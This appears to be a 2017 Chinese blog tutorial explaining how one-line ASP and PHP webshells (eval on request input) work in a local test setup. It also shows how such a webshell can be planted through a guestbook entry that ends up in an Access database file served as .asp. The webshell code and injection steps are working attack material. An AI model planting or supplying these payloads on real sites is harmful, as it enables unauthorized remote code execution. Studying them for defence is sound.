当前位置:首页 > 大杂烩 > 正文内容

一句话木马原理

高老师8年前 (2017-09-03)大杂烩2931
  1. 搭建模拟环境了解一句话木马的原理.

    (1).创建1.asp文件,代码如下:

        <%eval request("value")%>

       (2).创建2.php文件,代码如下:

         <?php @eval($_REQUEST['value']);?>

        创建了1个asp一句话木马文件,1个php一句话木马文件,上面的代码的意思是获取get/post来的value值,当作脚本代码执行。

        我们访问http://localhost/1.asp?value=Response.Write("gaojiufeng")    将会直接执行value的语句,输出gaojiufeng

        我们访问http://localhost/2.php?value=echo  gaojiufeng;    将会直接执行value的语句,输出gaojiufeng

        也就说一句话木马的语句都会将get/post的代码执行,为什么中国菜刀能获取到网站和服务器的磁盘列表,就是通过对应的asp/php等代码获取到

    2.通过本地的程序了解留言板提交一句话木马为什么可以直接连接

        (1).下载EASYNEWS1.01程序在本地部署

        (2).通过留言板留言,主页中填 <%eval request("value")%>,提交留言

        我们访问http://localhost/ebook/db/ebook.asp?value=Response.Write("13092996963"),将会输出我的手机号码13092996962;

        为什么访问/ebook/db/ebook.asp就能执行语句,我并没有创建一句话木马文件啊?由于ebook.asp是一个数据库accesss数据库文件,修改为asp后服务器认为数据库内容中的<%eval request("value")%>属于asp代码,其他不认识的一律认为是html标签输出。因此导致这个文件可以作为一句话木马连接。

扫描二维码推送至手机访问。

版权声明:本文由高久峰个人博客发布,如需转载请注明出处。

本文链接:https://blog.20230611.cn/post/496.html

分享给朋友:

“一句话木马原理” 的相关文章

PHP安装mongodb扩展

PHP安装mongodb扩展

在安装之前我们先看看官方给出的依赖关系.首先是dll文件和mongodb软件的依赖关系然后是PHP文件和dll的依赖关系我的是phpstudy的集成环境PHP5.4.45 NTS+Apache+Mysql【一】.安装mongodb3.0软件对比依赖关系下载mongodb3.0.msi软件,完整名称:...

Application的错误使用

Application的错误使用

Application 对象用于存储和访问来自任意页面的变量,类似 Session 对象。不同之处在于所有的用户分享一个 Application 对象,而 session 对象和用户的关系是一一对应的。很多的书籍中介绍的Application对象都喜欢以统计在线人数来介绍Application 对象...

Git从远程仓库更新文件

Git从远程仓库更新文件

 git   pull  https://git.oschina.net/392223903/learn.git   master   换为您的git地址...

c#关闭计算机的代码

c#关闭计算机的代码

    1.关机Process.Start("shutdown", "-s -t 0");    2. 注销  Proc...

C# md5加密,C# md5加密代码

C# md5加密,C# md5加密代码

public static string GetMD5(string str) {     //创建MD5对象     MD5 md5 = MD5.C...

redis安装教程

redis安装教程

1.文件redis-2.6.14.tar.gz的上传 /home/john/创建rdtar文件夹 上传redis-2.6.14.tar.gz至rdtar文件夹  2.解压文件  cd /home/john/rdtar tar &n...